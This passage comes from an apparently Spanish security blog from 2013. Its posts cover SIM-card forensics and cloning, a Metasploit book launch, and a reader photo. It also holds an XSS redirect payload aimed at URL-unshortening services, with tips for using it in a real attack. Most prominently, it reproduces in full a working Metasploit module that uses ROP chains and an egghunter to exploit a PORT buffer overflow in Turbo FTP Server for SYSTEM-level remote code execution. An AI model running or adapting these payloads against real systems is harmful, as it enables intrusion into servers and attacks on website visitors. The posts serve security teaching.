Para que se produzca correctamente la redirección, antes de usar la URL anterior debemos encodearla:http://www.evilchistera.com/"><script>location.href=String.fromCharCode(104,116,116,112,58,47,47,98,105,116,46,108,121,47,49,53,113,48,67,85,89)</script>

Obtenemos la correspondiente URL acortada de https://bitly.com/:http://bit.ly/11TuJh9

Y supongo que ya adivináis lo que ocurre cuando la introducimos en un servicio de unshortening vulnerable :D.

Si visitamos esta URL corta tal cual, fallará debido a que el archivo destino no existe realmente y, simplemente, hemos hecho una prueba de concepto basándonos en una URL ficticia. Si te apetece afinarlo más (tal y como se haría en un ataque real), puedes crear en un servidor el fichero con el XSS incluido en su nombre e incrustarle en el código html una redirección a la misma página destino del ataque. De esta manera, tanto si se visita el enlace corto como si se consulta en un servicio de unshortening, la víctima será redirigida a la página que queramos.

Después de esto, ¿qué podemos hacer si una URL acortada nos da mala espina y queremos saber su URL final sin preocuparnos de ser cazados? Una opción, lógicamente, es usar un servicio de unshortening que no sea vulnerable. Como no podemos asegurar nunca esto al 100%, esta opción no me gusta. Otra opción es instalar en el navegador alguno de los plugins que existen para estas tareas. NoRedirect, por ejemplo, ofrece un diálogo de confirmación antes de ser redirigido a la página final. Por último, también puedes usar cualquier método que te permita consultar el código fuente de la URL corta. Por ejemplo, puedes usar curl...

Saludos!http://twitter.com/joserabalhttp://www.lachisterablanca.com

martes, 11 de junio de 2013

Metasploit para Pentesters. 2ª Edición

Compartir este artículo:

Hoy tenemos el honor de presentar la segunda edición de Metasploit para Pentesters, ¿Quién me iba a decir a mí hace solo 7 meses que este libro, creado con toda la ilusión, funcionaría tan bien? Debo agradecer a todas las personas que han adquirido el libro y me han reportado feedback sobre él, espero que lo sigan haciendo los nuevos lectores del libro.

La seguridad de la información es uno de los mercados en auge en el mundo de la Informática de hoy en día. Los gobiernos y empresas valoran sus activos por lo que deben protegerlos de accesos ilícitos mediante el uso de auditorías que establezcan un status de seguridad a nivel organizativo. El pentesting forma parte de las auditorías de seguridad y proporciona un conjunto de pruebas que valoran el estado de la seguridad de la organización en ciertas fases.Metasploit es una de las herramientas más utilizadas en procesos de pentesting ya que contempla distintas fases de un test de intrusión. Con el presente libro se pretende obtener una visión global de las fases en las que Metasploit puede ofrecer su potencia y flexibilidad al servicio del hacking ético.El libro presenta de una manera ordenada la organización un tanto caótica de la arquitectura de Metasploit. Esto subsana lo que habitualmente supone una dificultad a los auditores de seguridad que necesiten utilizar el framework. El enfoque eminentemente práctico, mediante la escenificación de pruebas de concepto, guiará al lector a través de un gran número de posibilidades, para que de esta manera consiga asentar sus conocimientos en el framework y disponer así de distintos recursos para realizar distintas fases de un test de intrusión con la ayuda de Metasploit Framework.

Espero que en menos de 7 meses logremos llegar a la tercera edición, este hecho querrá decir que la difusión del conocimiento en el arte del hacking ético y la gran herramienta por excelencia en seguridad informática, desde mi punto de vista, mi querido Metapsloit, habrá llegado a mas rincones del mundo hispanoparlante.

"Uno piensa que conoce Metasploit hasta que le pega un repaso a este libro. Antes de leérmelo, hice "scroll" rápido sobre una copia que me enseño el Maligno, me tocó pararme varias veces para ver algunos trucos. No resistí, finalmente me pase por Bronxtoles y pedí mi propia copia."

lunes, 10 de junio de 2013

Herramientas forense para ser un buen CSI. Parte XXVI: Forense en SIMIII de IV

Compartir este artículo:
Buenas a todos, hoy vamos a continuar nuestra cadena sobre Forense en SIM hablando de la extracción de información con la utilidad MobilEdit!En primer lugar veremos como extraer el código ICCID, del que hablamos la pasada semana: http://www.flu-project.com/herramientas-forense-para-ser-un-buen-csi-parte-xxv-forense-en-sim-ii-de-iv.htmlAnalizando el ICCID y el IMSI
Como ya dijimos, el ICCID incluye la Dirección del Expedidor (IIN), compuesto por 7 dígitos que identifican el país, operador y red. Las Direcciones del Expedidor se encuentran definidas por la ITU-T, y podéis verlas en el siguiente PDF:
LISTA DE NÚMEROS DE IDENTIFICACIÓN DE EXPEDIDOR DE LA TARJETA CON CARGO A CUENTA PARA TELECOMUNICACIONES INTERNACIONALES (SEGÚN LA RECOMENDACIÓN UIT-T E.118(05/2006)) (SITUACIÓN AL 1 DE ENERO DE 2011)http://www.itu.int/dms_pub/itu-t/opb/sp/T-SP-E.118-2011-PDF-S.pdf
Para recuperar el ICCID de una SIM nos bastará con introducir la SIM en un lector de tarjetas (los podéis encontrar a partir de unos 5€ en tiendas de informática). Una vez introducida y detectada por nuestro PC, si abrimos la herramienta MobilEdit!, nos mostrará entre otra información, el código ICCID:
De la misma manera, podremos visualizar el IMSI. Nos será de mucha utilidad comparar sus 6 primeras cifras con la lista de MCC y MNC definida por la ITU-T en el siguiente documento:
http://www.itu.int/pub/T-SP-E.212B-2011/es
De esta manera sabremos de una manera rápida el país de origen y el operador de red. 
MobilEdit! también nos permitirá extraer la agenda de contactos del teléfono, tanto con los números de teléfono, como con los nombres identificativos asociados, como podéis ver en la siguiente captura:
También podremos visualizar el listado de llamadas, con los siguientes datos:
  • Número de teléfono destino
  • Fecha y hora de las llamadas
  • Duración de la llamada
Es importante saber que para poder acceder a toda esta información requeriremos el código PIN, aunque habrá cierta información a la que podremos acceder sin el PIN.
Eso es todo por hoy,
Saludos!

domingo, 9 de junio de 2013

Informe Flu - 127

Compartir este artículo:
A lo largo de la semana hemos publicado los siguientes artículos, ¡disfrutadlos!:

Lunes 3 de Junio

Martes 4 de JunioMiércoles 5 de JunioJueves 6 de Junio
Viernes 7 de Junio
Sábado 8 de Junio

sábado, 8 de junio de 2013

Pantalla Pública XXVII

Compartir este artículo:
Buenas a todos, hoy estamos aquí una semana más con nuestras pantallas públicas. Hoy, en la edición nº27 tenemos una nueva pantalla que nos envía Joaquín desde Barcelona, ¡muchas gracias! Os dejamos con su mensaje:
Hola!
 
Os envio una pantalla pública,
es de una exposición que hay en el Museo Maritimo de Barcelona
No se lee el mensaje de error ya que la foto es con el movil...
 
las pantallitas tienen que mostrar caras de mujeres pero hay algunas que muestran mensaje de error y pantalla verde.
 
 
 

viernes, 7 de junio de 2013

Turbo FTP Server 1.30.823 PORT Overflow

Compartir este artículo:

Hoy os traemos un módulo de tipo exploit para Metasploit. La aplicación vulnerable es Turbo FTP Server. Os dejamos el código fuente (ruby) del módulo y un video que ayuda a la explotación.

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.#   http://metasploit.com/##

require 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = GreatRankinginclude Msf::Exploit::Remote::Ftpinclude Msf::Exploit::Remote::Egghunterdef initialize(info = {})super(update_info(info,'Name'           => 'Turbo FTP Server 1.30.823 PORT Overflow','Description'    => %q{This module exploits a buffer overflow vulnerability found in the PORTcommand in Turbo FTP Server 1.30.823 & 1.30.826, which results in remotecode execution under the context of SYSTEM.},'Author'         =>['Zhao Liang',    #Initial Descovery'Lincoln',       #Metasploit'corelanc0d3r',  #Metasploit'thelightcosine' #Metasploit],'License'        => MSF_LICENSE,'Platform'       => [ 'win' ],'References'     =>[[ 'OSVDB', '85887' ]],'Payload'        =>{'BadChars'       => "\x00",'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,'EncoderOptions' => { 'BufferRegister' => 'EDI' }},'Targets'        =>[[ 'Automatic', {} ],['Windows Universal TurboFtp 1.30.823',{'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]'ver' => 823},],[ 'Windows Universal TurboFtp 1.30.826',{'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]'ver' => 826},],],'DisclosureDate' => 'Oct 03 2012','DefaultTarget'  => 0))enddef checkconnectdisconnectif (banner =~ /1\.30\.823/)return Exploit::CheckCode::Vulnerableelsif (banner =~ /1\.30\.826/)return Exploit::CheckCode::Vulnerableendreturn Exploit::CheckCode::Safeenddef create_rop_chain(ver)# rop chain generated with mona.py - www.corelan.beif ver == 823rop_gadgets =[0x004b692a, # POP ECX # RETN [tbssvc.exe]0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]0x005d1c99, # POP EBP # RETN [tbssvc.exe]0x004cad5d, # & jmp esp [tbssvc.exe]0x004ab16b, # POP EBX # RETN [tbssvc.exe]0x00000001, # 0x00000001-> ebx0x005ef7f6, # POP EDX # RETN [tbssvc.exe]0x00001000, # 0x00001000-> edx0x005d7139, # POP ECX # RETN [tbssvc.exe]0x00000040, # 0x00000040-> ecx0x004df1e0, # POP EDI # RETN [tbssvc.exe]0x00411985, # RETN (ROP NOP) [tbssvc.exe]0x00502639, # POP EAX # RETN [tbssvc.exe]0x90909090, # nop0x00468198, # PUSHAD # RETN [tbssvc.exe]].flatten.pack("V*")elsif ver == 826rop_gadgets =[0x0050eae4, # POP ECX # RETN [tbssvc.exe]0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]0x00496A65, # XOR EAX,EAX [tbssvc.exe]0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe]0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe]0x00000001, # 0x00000001-> ebx0x0058a27a, # POP EBP # RETN [tbssvc.exe]0x004df7dd, # & call esp [tbssvc.exe]0x005f07f6, # POP EDX # RETN [tbssvc.exe]0x00001000, # 0x00001000-> edx0x004adc08, # POP ECX # RETN [tbssvc.exe]0x00000040, # 0x00000040-> ecx0x00465fbe, # POP EDI # RETN [tbssvc.exe]0x004fb207, # RETN (ROP NOP) [tbssvc.exe]0x00465f36, # POP EAX # RETN [tbssvc.exe]0x90909090, # nop0x004687ff, # PUSHAD # RETN [tbssvc.exe]].flatten.pack("V*")endreturn rop_gadgetsenddef exploitmy_target = targetif my_target.name == 'Automatic'print_status("Automatically detecting the target")connectdisconnectif (banner =~ /1\.30\.823/)my_target = targets[1]elsif (banner =~ /1\.30\.826/)my_target = targets[2]endif (not my_target)print_status("No matching target...quiting")returnendtarget = my_targetendprint_status("Selected Target: #{my_target.name}")connect_loginrop_chain = create_rop_chain(target['ver'])rop = rop_chain.unpack('C*').join(',')eggoptions ={:checksum => true,:eggtag => 'w00t',:depmethod => 'virtualalloc',:depreg => 'esi'}badchars = "\x00"hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)speedupasm = "mov edx,eax\n"speedupasm << "sub edx,0x1000\n"speedupasm << "sub esp,0x1000"speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_stringfasterhunter = speedupfasterhunter << hunterprint_status("Connecting to target #{target.name} server")buf1 = rand_text_alpha(2012)buf1 << eggbuf1 << rand_text_alpha(100)buf2 = rand_text_alpha(4).unpack('C*').join(',')buf2 << ","buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eipbuf2 << ","buf2 << ropbuf2 << ","buf2 << fasterhunter.unpack('C*').join(',')buf2 << ","buf2 << rand_text_alpha(90).unpack('C*').join(',')send_cmd( ['CWD', buf1], true );send_cmd( ['PORT', buf2], true );print_status("Egghunter deployed, locating shellcode")handlerdisconnectendend
VIDEO:

[youtube aW0jfcXKQk8 nolink]

jueves, 6 de junio de 2013

Herramientas forense para ser un buen CSI. Parte XXV: Forense en SIM II de IV

Compartir este artículo:

Buenas a todos, hoy continuaremos con la segunda parte de nuestra cadena sobre Forense en SIM. En el pasado artículo hablamos sobre la información almacenada en las tarjetas SIM. Hoy nos centraremos en la clonación de las mismas, y en el acceso a los datos almacenados en ellas.

Es importante tener claro el concepto de que copiar una SIM no es lo mismo que clonarla. Al igual que no es lo mismo realizar una imagen de un disco duro, que un clon bit a bit :)

  • Copiar: es el proceso realizado por el fabricante donde genera un nuevo IMSI (International Mobile Subscriber Identity) y KI (clave de autenticación) de una tarjeta. Procedimiento para generar una nueva tarjeta copiando contenido de la anterior.
  • Clonar: es la reproducción exacta de una tarjeta con el mismo IMSI y KI de la original.

Existen en el mercado muchas clonadoras de tarjetas SIM, y no son caras. Estos aparatos nos permitirán clonar una SIM sin el PIN y generando una nueva SIM con toda la información disponible. Pero para este proceso necesitaremos lo siguiente:

  • ICCID: Integrated Circuit Card Identity
  • IMSI: International Mobile Subscriber Identity

Sin embargo, el acceso a estos identificadores no requieren que dispongamos del PIN de la tarjeta SIM, por lo que no hay que preocuparse, y obtenerlos es tan sencillo como leer una tarjeta sim con un lector USB. Lo iremos viendo proximamente.

Una de las clonadoras más conocidas del mercado es la XRY SIM id-Cloner, como veis no tiene un aspecto muy diferente al de un lector de tarjetas SIM común.

Os dejo a continuación con la presentación que realiza el fabricante:

XRY SIM id-Cloner

When examining GSM based mobile phones the forensic examiner is faced with two challenges:

1) Under the original GSM standards a mobile phone is required to have a SIM card inserted before it will allow full access to the operating system and function normally.

2) If a GSM device is turned on with a live SIM card inserted, then it will attempt to make a network connection and the risk of data contamination occurs.

The SIM id-Cloner card system solves these problems. It will prevent a GSM network connection without effecting the normal operation of the device allowing an examiner to perform a logical extraction. It will also be of assistance to examiners faced with a mobile phone which does not have the original SIM card present.

Under the GSM standards a mobile device should delete the call history if it detects that a new SIM card has been inserted into it. An examiner who has a mobile without a SIM card can use SIM id-Cloner to create a duplicate SIM card containing the same critical information as the original SIM, which will then give access to the handset without causing the device to delete the call history list. Please note that the examiner needs either the ICCID or IMSI, which normally requires a contact with the mobile network operator to perform this function.

This product is supplied as part of the XRY Logical system as standard, it can however be purchased separately if required.

Una vez que ya tengamos la SIM clonada, utilizaremos una serie de herramientas para analizarla. Yo suelo hacer uso de las siguientes:

  • MOBILedit!
  • SIM Manager
  • SIMSpy

Hay muchas otras en el mercado, pero estas son algunas de las más sencillas de utilizar. Las iremos explicando en los próximos artículos, pero antes es necesario que aprendamos unos conceptos previos.

¿Qué es el ICCID (Integrated Circuit Card ID)?

Es el número de serie que el fabricante da al chip (formado por hasta 19 dígitos)

  • Dirección del Expedidor (IIN): (7). País, operador y red. Se desglosa en:
    • Identificador de Actividad Industrial (MII): (2). Industria. (Telecomunicaciones: 89).
    • Código de país: (1-3). País. (España: +34).
    • Identificador del emisor: (1-4). Expedidor. (España: 2 dígitos).
  • Numero de identificación de cuenta individual
  • Cifra de control de Luhn: (1). Checksum control de errores

¿Qué es el IMSI (International Mobile Subscriber Identity)?

Es el código de identificación único para identificarse en redes GSM y UMTS y está formado por hasta 15 dígitos:

  • Código de país (MCC): (3). País. (España: 214).
  • Código de operador de red (MNC): (2-3). Operador de red.
  • Código de estación móvil (MSIN): (9-10). Identificador del operador para cada línea de sus clientes
Cuando el teléfono se enciende envía su IMSI al operador de la red solicitando acceso y autenticación. Entonces el operador de la red busca en su base de datos el IMSI y la clave de autenticación (Ki) relacionada. El operador de la red genera un número aleatorio y lo firma con la Ki de la SIM, generando así un número conocido como SRES_1 (Signed Response 1, ‘Respuesta Firmada 1’). El móvil cliente de la red envía el RAND a la tarjeta SIM, que también lo firma con su Ki y envía el resultado (SRES_2) de vuelta al operador de la red. El operador de la red compara su SRES_1 con el SRES_2 generado por la tarjeta SIM. Si los dos números coinciden, la SIM es autenticada y se le concede acceso a la red.

¿Qué es el Location Area Identify (LAI)?

Las redes de operadores se dividen en áreas locales, cada una tiene un LAI único. Si el móvil cambia de área, registra el LAI en la SIM y la envía al operador. Cuando se apaga y se enciende, lo recupera de la SIM y busca el LAI donde estaba.
Consta de:
  • Código de país (MCC): 3 dígitos. País. (España: 214).
  • Código de operador de red (MNC): 2-3 dígitos. Operador de red
  • Código de área de localización (LAC): 5 dígitos. Zona de ubicación.

Eso es todo por hoy, en el próximo artículo veremos como recuperar toda esta información de una tarjeta SIM :)

Saludos!